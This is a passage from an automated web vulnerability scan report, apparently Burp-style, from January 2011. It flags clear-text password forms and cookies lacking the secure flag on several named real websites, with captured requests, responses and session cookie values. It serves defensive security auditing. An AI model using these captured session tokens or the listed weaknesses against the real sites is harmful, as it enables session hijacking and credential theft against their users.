IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9NNGhyUDM0MzgwMDA5LzIyMjA5L2xp/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Vinson-&-Elkins-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...

6.120. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/

The form contains the following password field:

password

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/" method="POST">
<div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
<br />
...[SNIP]...

6.121. http://www.veterinarycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.veterinarycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.veterinarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.122. http://www.volunteercrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.volunteercrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.volunteercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.123. http://www.woothemes.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.woothemes.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.woothemes.com/wp-login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Fri, 21 Jan 2011 19:37:28 GMT
Vary: Cookie
Expires: Fri, 21 Jan 2011 20:37:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: a9602306e2be29cba5c13f300262aee7
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

6.124. http://www.workathomecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.workathomecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.workathomecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.125. http://www.writingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.writingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.writingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 9 instances of this issue:

https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.lawschoolloans.com/lslprivateloan_application.php
https://www.bmwusa.com/ScriptResource.axd
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
https://www.bmwusa.com/Secured/NaN
https://www.bmwusa.com/WebResource.axd
https://www.bmwusa.com/favicon.ico
https://www.bmwusa.com/jsenvconst.ashx
https://www.lowermybills.com/lending/home-refinance/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; path=/; HttpOnly
NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

7.2. https://www.lawschoolloans.com/lslprivateloan_application.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.lawschoolloans.com
Path:	/lslprivateloan_application.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29907

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...

7.3. https://www.bmwusa.com/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=xsYbuK7UM5sZi4sgTCQGLxdtzGqRs1PKkQMgf2iUU6r30EQJogswAvyo68dvUJYTVgi5uVrBob_AaI2WwdpOUs8_OfdMRKIRvOzu3nlcdOKo4McHeCE-VXEOoDvGmIjUxMiOI8-p6cynHt62iKqWq_-WJ1JLRo_Mnr4cF1MdnWuuCYkNo73irNzDSQk-1A5oR5uIyg2&t=6eeae64a HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:45 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:45 GMT;path=/
Content-Length: 28550

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,
Bottom : 2,
Left : 3
}
AjaxControlToolk
...[SNIP]...

7.4. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

7.5. https://www.bmwusa.com/Secured/NaN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; path=/
NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

7.6. https://www.bmwusa.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:46 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=ZCit8Gm9Dm66VElz-Dlx7uNapXPkA4epDI8AMwu3sVIkDC0fSDwQQvsa6O8fmHTyDoiwD63Zl_78HL2Qp1KFWorQ7nM1&t=634222732007903694 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
